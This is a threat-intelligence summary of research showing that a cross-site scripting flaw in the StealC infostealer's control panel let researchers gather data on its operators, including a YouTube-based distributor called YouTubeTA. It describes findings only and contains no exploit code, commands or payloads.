Key Findings

• Cybersecurity researchers discovered a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC information stealer malware.

• By exploiting the flaw, researchers were able to collect system fingerprints, monitor active sessions, and steal cookies from the infrastructure designed for cookie theft.

• StealC is a malware-as-a-service (MaaS) offering that emerged in January 2023, leveraging YouTube as a primary distribution mechanism to disguise the malware as cracks for popular software.

• The malware's source code was later leaked, providing an opportunity for researchers to identify characteristics of the threat actors' computers and retrieve active session cookies.

• A threat actor known as YouTubeTA was found to have extensively used YouTube to distribute StealC by advertising cracked versions of Adobe software, amassing over 5,000 logs that contained 390,000 stolen passwords and more than 30 million stolen cookies.

• The research underscores the impact of the MaaS ecosystem, which empowers threat actors to mount attacks at scale while also exposing them to security risks that legitimate businesses face.

Background

StealC is an information stealer that first emerged in January 2023 under a malware-as-a-service (MaaS) model, allowing potential customers to leverage YouTube as a primary mechanism – a phenomenon called the YouTube Ghost Network – to distribute the malicious program by disguising it as cracks for popular software. Over the past year, the stealer has also been observed being propagated via rogue Blender Foundation files and a social engineering tactic known as FileFix.

StealC, in the meantime, received updates of its own, offering Telegram bot integration for sending notifications, enhanced payload delivery, and a redesigned panel. The updated version was codenamed StealC V2. Weeks later, the source code for the malware's administration panel was leaked, providing an opportunity for the research community to identify characteristics of the threat actor's computers, such as general location indicators and computer hardware details, as well as retrieve active session cookies from their own machines.

Vulnerability Discovery

Researchers at CyberArk discovered a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC malware. By exploiting this flaw, they were able to collect system fingerprints, monitor active sessions, and steal cookies from the very infrastructure designed to steal them.

The researchers noted the irony of an operation built around large-scale cookie theft failing to protect its own session cookies from a textbook attack. The exact details of the XSS flaw have not been disclosed to prevent the developers from plugging the hole or enabling any other copycats from using the leaked panel to try to start their own stealer MaaS offerings.

Threat Actor Analysis

The research also shed light on a StealC customer named YouTubeTA (short for "YouTube Threat Actor"), who has extensively used Google's video sharing platform to distribute the stealer by advertising cracked versions of Adobe Photoshop and Adobe After Effects, amassing over 5,000 logs that contained 390,000 stolen passwords and more than 30 million stolen cookies.

Most of the cookies are assessed to be tracking cookies and other non-sensitive cookies. It's suspected that these efforts have enabled the threat actor to seize control of legitimate YouTube accounts and use them to promote cracked software, creating a self-perpetuating propagation mechanism.

Further analysis has determined that the panel enables operators to create multiple users and differentiate between admin users and regular users. In the case of YouTubeTA, the panel has been found to feature only one admin user, who is said to be using an Apple M3 processor-based machine with English and Russian language settings.

In a twist of operational security, the threat actor's location was exposed around mid-July 2025 when they forgot to connect to the StealC panel through a virtual private network (VPN), revealing their real IP address, which was associated with a Ukrainian provider called TRK Cable TV. This suggests that YouTubeTA is a lone-wolf actor operating from an Eastern European country where Russian is commonly spoken.

Conclusion

The research underscores the impact of the MaaS ecosystem, which empowers threat actors to mount attacks at scale within a short span of time, while inadvertently also exposing them to security risks legitimate businesses deal with.

The findings indicate that the StealC developers exhibited weaknesses in both their cookie security and panel code quality, allowing researchers to gather a great deal of data about their customers. The researchers suggest that if this holds true for other threat actors selling malware, it could provide valuable insights and potentially even reveal the identities of many malware operators.

Sources

• https://thehackernews.com/2026/01/security-bug-in-stealc-malware-panel.html

• https://securityonline.info/spy-vs-spy-predator-malware-now-hunts-the-researchers/

• https://x.com/TheCyberSecHub/status/2013150748113248757

• https://www.cypro.se/2026/01/19/security-bug-in-stealc-malware-panel-let-researchers-spy-on-threat-actor-operations/